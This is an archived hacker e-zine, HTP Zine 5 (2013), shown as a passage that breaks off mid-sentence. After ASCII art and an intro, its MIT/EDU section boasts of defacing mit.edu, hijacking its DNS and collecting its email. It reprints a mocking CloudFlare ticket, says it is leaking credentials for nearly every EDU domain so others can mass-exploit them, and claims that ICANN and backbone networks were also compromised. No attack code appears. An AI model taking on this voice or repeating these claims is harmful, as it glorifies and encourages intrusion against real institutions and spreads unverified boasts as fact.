Hack The Planet (HTP) Zine 5

EDB-ID:

25306


Author:

HTP

Type:

papers


Platform:

eZine

Date:

2013-05-08


▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                                                       ▄▄▄▄▄▄▄▄▄                
██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro       █       █                
█████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU     ▀▀▀█  █▀▀                
███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode         █  █                  
█▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap           █  █▄▄▄▄▄▄▄▄▄         
███ ██ ▄▀ ▀▄ ██ █▓▓   ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri         ▀▀▀▀█       █         
█▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓   ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD           █  █▀█  █         
█▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark          █  █▄█  █         
█▓█ ________________________________ █▓█ > Art                █       █▄▄▄▄▄▄   
█▓█ HTP____________________MWTB_DLTR ███ > Zerodays           ▀▀▀▀▀▀▀█      █   
██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro                     █  █▀▀▀▀   
█▓▓██  █▀▀████████████████████▀▀█  ██▓▓█ > See reverse for           █  █▄▄▄▄   
████  ████████████████████▓▓██████  ████ > HTP4                      █      █   
                                                                     ▀▀▀▀▀▀▀▀   
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

                                                                                
                            █████████████▒████████                              
                        ▓▒██████▒░█░███░░ ▒███████████▒                         
                     ███████████   ▓█████████████████████▒                      
                  ▓████  ▒█████████▒▒░███████████████████████▒                  
              ░▒███████░████████▒██     ▒██████████████████████░                
             ▓███████████████▒██  ░█     ░████████████████████████░             
            ████████████████████▒  ███▒█████████████████████████████            
          ░████████▒██████████████████     ▒█████████████████████████▒          
         ███████████▒████████████     ▒     ███████████████████████████▒        
       ▒██████████▒ ░████████████     ▒██▓  ░▒██████████████████████████▒       
       █████████  ▒███▒   ███████░    ███████████████████████████████████       
      █████████░██████    █████▒██▓ ▓███████▒▒████████████████████████████      
    ▒██████████████████   ████▒▓▒█▒   █████████████████████████████████████     
   ░████████████████████░▓█░    ░█     ░▓███████████████████████████████████    
   ███████████████████▓   ░       █       ░██████████████████████████████████   
  ████████████████████            █▒   ██░▒███████████████████████████████████  
 ▒███████████████████     ▒     ▒▓███▒▓    ███████████████████████████████████  
░██████████████████       █▓▓▓▓█░  █        ████████████░     ░████████████████ 
██████████████████      ▓███       █░       █████████████▓██████████████████  █ 
██████████████████   ░░  ▓█         ▒        ███████████████████████████████  ▓ 
██████████████████░ ▓     █░        █        ███████████████████████████████░   
██████████████████        ██       ▒███      ████████████████████████████████▒█ 
███████████████▒██         █     ░▒▒██      ░▒████████████████████████████ █    
███████████████▒▒▒         ███               ████████████████████████████▒ █░   
█░ ▓▓██████   ░ ▓█      ████▒         █      ████████████████████████████  █▓   
     ██████▒    ▒█     ▒   █▓         █      ▓████████████████████████████ ▒█▒  
▓  ▒▒█▓█▓████   ▒▒██▒                 ██  ▒▒▒░█████████████████████████████▓██  
███▓   █░  ▒██████░         ░       ░▓███▒      ██████████████████████████████░ 
██     █▓   ░████▒▒         ██  ▒  ░▒▒▓█▒        █████████████████████████████  
░      ▓█▓    ██████▓▒      ███        ██         ██▓█▒▓░  ░██████████████████  
▒░     ░███   ████████████▒▒ ▓▓        ▓█░        █         ██████████████████  
█▒    ▒██▒   ██████████████   ░         █▒      ▒▒█▒▓   ▒▒▒░██████████████████  
██   ██ ▒▓  ███████████████████         ██▒ ▒███▒▓██▓       █    ░████████████  
██▓█     █  ███████████████████▒       ███▓       ▓█        █▓    ████████████▓ 
███       ██████████████████████░▒▒█▒   ▒█         █▒       ██     ██████████▓  
█▒█       ████████████████████████       ░░        █▒       ▒      ▓██████████  
▒▒█       ███████████████████████         █        █        ▒      ▒▒█████████▓ 
█▒       ▒███████████████████████▒        █        ██      ██▒     ██  ░███▒ ██ 
██ █   ▒░  ▓███████████████████ ██       ███▒ ▒   ░██      █▒▒    ▒████░░██  ██ 
 █▓███▒     ██▓▒█████████████░   ██ ▓█░░░░██░      █▒      ▒      ░█░   ▓█░░██░ 
  ████▒       █ ▓███████████    ▓███░      █       ▓█      ▒            ▒▓ ███  
  █████       ███  ████████░  ▒█░ ██       █       ██     ▒▓      ▒    ███ ██   
   █▓██▓      ██▒   ▒███████▓      █▒      ▓▓     ░███    ██▒▒▒ ▒█░  ███████▒   
    ▒█░▒     ░ ░█░   ███████▒       ░▓     ▒█████▒███▓░  ▒███▒████░ ███████▒    
    ▒█████░░     ░▒  ░███████       ░█▓  ░░███     █      █    █    ██████▓     
     ▒██████      ▒███████████  ░  ▒▒███    ░▓     █     ░    ░█    █████▒      
      ▒███████▒    ███  ▒██████░███▒▒▒█░      ▒    ▓    █░    █   ░████▓        
        ███████  ░█░ ░▒    ▓██████     █     ▒█    █░  ▓██░░█▒▒  ▒████▒         
         ▓███████     ▒█▒  ░██ ▒██       ▒    ███████ ███░████▓██████           
      /████████    /████████    /██████████████████     /███████████████▄       
     |▒████████    |████████   |▒██████████████████    |▒█████████████████      
     |▒████████    |████████   |▒██████████████████    |▒██████▀▀▀▀▀▀█████      
     |▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█   |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/    |▒█▓▓▓▓▓     |▓▓▓██      
     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▓▓▓▓▓▓█         |▒█▓▓▓▓▓     |▓▓▓██      
     |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█        |▒█▒▒▒▒▒▒█         |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██      
     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█▒▒▒▒▒▒█         |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██      
     |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█        |▒█░░░░░░█         |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀       
     |▒█░░░░░░█▀▀▀▀▒█░░░░░░█        |▒█░░░░░░█         |▒█░░░░░█                
     |▒█░░░░░░█   |▒█░░░░░░█        |▒█      █         |▒█░░░░░█                
     |▒█      █   |▒█      █        |▒█▄▄▄▄▄▄█         |▒█     █                
     |▒█▄▄▄▄▄▄█   |▒█▄▄▄▄▄▄█        |/▒▒▒▒▒▒▒/         |▒█▄▄▄▄▄█                
     |/▒▒▒▒▒▒▒/   |/▒▒▒▒▒▒▒/                           |/▒▒▒▒▒▒/   ░ ░░▒  ZINE 5
                                                                                
htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                     NORTH KOREA OF THE INTERNET SINCE 2011                     
                                                                                
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                                                                                
 So its been 182 days since our last zine, since then our dedicated team        
 of researchers, philanthropists, playboys and troublemakers have been          
 busy at work scouring the Internet for high quality entertainment at the       
 expense of everybody who isn't us.                                             
                                                                                
 5/1 also marks the day HTP was founded, which means we've had two              
 glorious years of being the best and owning the rest. Today we will be         
 drinking 40s, listening to some balla tunes, and circlejerking over the        
 inevitable confusion, awe, bitterness and jokes that will ensue from           
 this release. :)                                                               
                                                                                
 Due to the immense size of HTP5, this zine is unfortunately not self           
 extracting. However do not fret, this zine is full HD and 4D ready.            
 We've divided everything into its own section just to keep things sane.        
                                                                                
 So go get the popcorn ready and strap in for a long and wild ride. This        
 zine is a tale of trust, betrayal, brotherhood, rampant paranoia,              
 hilariously shoddy police work (More on that later), and the plight of         
 the whitehat sheep being fleeced at will by their blackhat shepherds.          
 It's really only missing a tacked on love story, a few good car chases,        
 and an explosion at the end, but it might not be too late for all of that.     
                                                                                
                                                                                
                      ▀ ▄                                                       
                         █▄▄                                                    
                    ▄____ ░ █▄                                                  
          ▄   ▄███▀▀ \;',`'-,▓█░                                                
            ▓██▀-;_,;  ':-;_,'.█▓░                                              
          ▓▓██;   '/    ,  _`.-\█▓                                              
        ░▓███▄'`. (`     /` ` \`|█                                              
     ░ ▓▓▓ █|██  `\`-.   \_   / |▓                                              
   ░█▓▓█▓░░ |  █▓ (   `,  .`\ ;'|░                                              
  ░▓▓█░ ░░   \ ░ ▓░░ .'     `-'/▀                                               
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░      .'▀                                                
░██▓▀ ▀█████████████████▄.-'`                                                   
 ███░  ███▀▀███▀▀███  ███                                                       
 █████████  ███  ███▄▄███  2013  ▒ ░                                            
 █████████  ███  ██████▀                                                        
 ███   ███  ███  ███                                                            
▄███▄ ▄███▄ ███ ▄███▄                                                           
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀                                                          
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄


░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
                                                                                
                                                                                
                                           ▄                                    
                                       ░████▓██▓██▓▒▒▒░                         
                                  ░▒██████▓▓███████▒████▒░░░░                   
                              ░▓████████████████▒██▓████▒▒░░ ░░   ░░░░          
                           ░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░        
                         ▒████████████████████████████████▓▓▓██████▓ ▒  ░░      
                        █▓▓███████████████████████████████████████▓▓▓  ░ ░ ░▒   
                      ░▓▓█▓███████████████████████████████████████████░ ▒ ░  ▒░ 
                    ▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒    ░ 
                 ░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░  ░ ░
               ░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒  ░  ░░
              ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░  
            ░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█   ▒░
           ░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
         ░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
        ▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
       ▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
      ▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
      █▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
     ░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
     ░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
     ░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
    ▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
    ██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
    ██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
    ████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
    █▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
    ▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
    ▒█▒░ ▓ ░▒▒░  ░  ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
    ░█▒░  ░               ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
     ░░                   ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
       ░                 ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
       ░                ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
        ░       ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░  ░░░▒░▒█████████
         ░░░░ ░▒▓▒     ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
          ░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
            ░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
             ░ ░▒▒▒░    ░░▒▒░░      ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
              ░░░░░     ░▒▒░░       ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
              ░░░      ░▒▒░░        ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
              ░░                    ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
              ░░                   ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
             ░░                   ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
            ░░░                  ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
            ░░                  ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
            ░ ░░░░░             ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
           ░░ ░▒░░░░░          ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
           ░░░░░ ░░▒▒░        ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
             ░▓▒▒▒▒▒▓░        ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
                ▒░░░         ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
                 ░           ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░ 
                ░             ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░  
                ░░░░░░░░░░░░  ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒   
                 ░▒▒▒▒▒▒▒▓▓▒░  ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░   
                  ░▒▒      ░░░  ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░  
                   ░   ░░░░░    ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░  
                   ░▒▒▓▓▒░░     ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒   
                   ░░░▒▒░░░     ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░   
                    ░           ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░   
                     ░         ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░   
                     ░        ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░  
                     ░      ░░░▒▒▒▒▒▒▒▒▒░   ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
                      ░░   ░▒▒▒▒▒▒▒▒░░       ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
                        ░░░▒▒▒▒▒░░░          ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
                                             ░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
                                              ░  ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
                                               ░   ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
                                                ░     ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
                                                ░       ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
                                                ░           ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
                                                 ░              ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
                                                ▒              ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
                                             ▒▒██           ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
                                          ░▒█▓██▒          ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
                                         ▓███▓██         ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
                                      ░░█████▓▒    ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
                                     ░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
                                    ░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
                                  ░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
                                   ▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
                                  ░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
                                 ▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
                                 ███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
                                ███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
                               ▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
                              ▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
                             ░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"What's the score?"                                                             
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
 ██ ██ ██  ██  █████                                                        HTP5
 ██ ██ ██  ▄▄  ▄▄                                                               
 ██ ▀▀ ██  ██  ██      FEATURING EDUCAUSE                                       
▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
Back in January we decided to upstage Anonymous (again) and have a little fun   
with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.  
In doing so, we knew we had to make it very clear that it was an anti-Anonymous 
deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus 
why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH          
ANONYMOUS." Despite all this, some of the cluebags in the media apparently      
thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss 
leejun y0!" Additionally, almost everybody missed the fact that it was a troll  
deface, which just proves that it will be a few decades before we reach October 
1st, 1993.                                                                      
                                                                                
MIT's reaction was particularly lulzy. They did a better job of reporting the   
facts than all the media outlets, but they couldn't decide whether the e-mail   
got intercepted or not. First, there was this from                              
http://tech.mit.edu/V132/N62/hack.html:                                         
                                                                                
"Unlike previous attacks, which temporarily disabled some services, this attack 
had the potential to be much more severe. A more calculated hacker could have   
intercepted email messages intended for anyone at the MIT.edu domain, including 
all alumni who use alum.mit.edu email addresses."                               
                                                                                
After having a day to do a better post-mortem, MIT started freaking out. They   
published this: http://tech.mit.edu/V132/N63/hack.html. From that link:         
                                                                                
"Unlike previous attacks, which temporarily disabled some services, this attack 
had the potential to be much more severe. Email was specifically affected. Mail 
is normally received by one of nine different MIT servers; however today, mail  
that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at     
KAIST, Korea Advanced Institute of Science and Technology, meaning the          
attackers had complete control of emails successfully sent during that time."   
                                                                                
We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail  
when we see it :P. So who owned the domain? Well :                              
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
Domain Name: MIT.EDU                                                            
                                                                                
   Registrant:                                                                  
      Massachusetts Institute of Technology                                     
      Cambridge, MA 02139                                                       
      UNITED STATES                                                             
                                                                                
   Administrative Contact:                                                      
      I got owned                                                               
      Massachusetts Institute of Technology                                     
      MIT Room W92-167, 77 Massachusetts Avenue                                 
      Cambridge, MA 02139-4307                                                  
      UNITED STATES                                                             
      (617) 324-1337                                                            
      cunt@mit.edu                                                              
                                                                                
   Technical Contact:                                                           
    OWNED NETWORK OPERATIONS                                                    
      ROOT                                                                      
      US                                                                        
      DESTROYED, MA 02139-4307                                                  
      UNITED STATES                                                             
      (617) 253-1337                                                            
      owned@mit.edu                                                             
                                                                                
   Name Servers:                                                                
      FRED.NS.CLOUDFLARE.COM                                                    
      KATE.NS.CLOUDFLARE.COM                                                    
                                                                                
   Domain record activated:    23-May-1985                                      
   Domain record last updated: 22-Jan-2013                                      
   Domain expires:             31-Jul-2013                                      
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                                                                                
Here's the cherry on top:                                                       
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                                                                                
From:   "CloudFlare Support" <support@cloudflare.com>                           
Subject:        [CloudFlare Support] Pending request: Why is cloudflare staff   
modifying my dns records? (ticket #12053)                                       
Date:   Wed, January 23, 2013 4:48 pm                                           
To:     "Fuckmit" <fuckmit@tormail.org>                                         
                                                                                
##- Please type your reply above this line -##                                  
                                                                                
[CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns  
records? (ticket #12053)                                                        
                                                                                
This is an email to remind you that your request (#12053) is pending and awaits 
your feedback.                                                                  
                                                                                
Please click the link below to review and update your request:                  
http://support.cloudflare.com/tickets/12053                                     
                                                                                
----------------------------------------------                                  
                                                                                
Justin, Jan 22 11:48 am (PST)                                                   
                                                                                
Hi,                                                                             
                                                                                
We have reason to believe you are not the actual owner of the mit.edu domain.   
We have been in contact with the actual owner this morning.                     
                                                                                
As such we have taken steps to secure the account, and the domain has already   
been returned to the actual owner.                                              
                                                                                
----------------------------------------------                                  
                                                                                
Fuckmit, Jan 22 11:45 am (PST)                                                  
                                                                                
Two questions:                                                                  
Why is cloudflare staff modifying my dns records without authorization?         
Why is cloudflare staff repeatedly regenerating my API key every time they      
decide to modify my dns records without authorization?                          
                                                                                
--------------------------------                                                
This email is a service from CloudFlare Support                                 
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                                                                                
You have reason to believe a user named 'Fuckmit' is not the legitimate owner   
of mit.edu? Excellent deduction, Justin.                                        
                                                                                
Soon after, we decided to troll Gizmodo and the rest of the media into          
preserving our access. The 'browser exploit' on MIT's NOC                       
( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )   
never existed. We'd never show our full hand at once, we'd just lose access.    
                                                                                
MIT certainly believed us though, despite their own reassurances otherwise. For 
confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)      
after finally asserting that we got access to their EDUCAUSE account.           
                                                                                
EDUCAUSE then made the fatal mistake of overlooking our complete access into    
the EDU TLD. Though, we can't say we expect much from a registrar running ASPX  
on their backend.                                                               
                                                                                
Now, just in case you don't believe us, we have entrusted the login credentials 
of nearly every EDU domain to hackers worldwide (active as we speak) within the 
MIT section of this zine. So, let's see what happens first, mass exploitation   
or whitehat response? ;) We are not ones for defacing, actually, and we're      
going to leave that up to the Internet Justice League (AKA Anonymous) if they   
can even get to it on time. And we figure they'll manifest some statement       
about how its morally justifiable to deface *.edu. We frankly don't care.       
                                                                                
By the end of today (5/6), EDU operation should return to normal.               
                                                                                
Moreover, we particularly enjoyed the fact that the first nameserver for        
root-servers.org is an EDU domain. This effectively gave us control over        
root-servers.org. However, ICANN is responsible for the root zones file.        
                                                                                
ICANN was already compromised by that time, though, joined by several of the    
major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+        
backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
they used passwordless private keys stored on their servers to ssh into the     
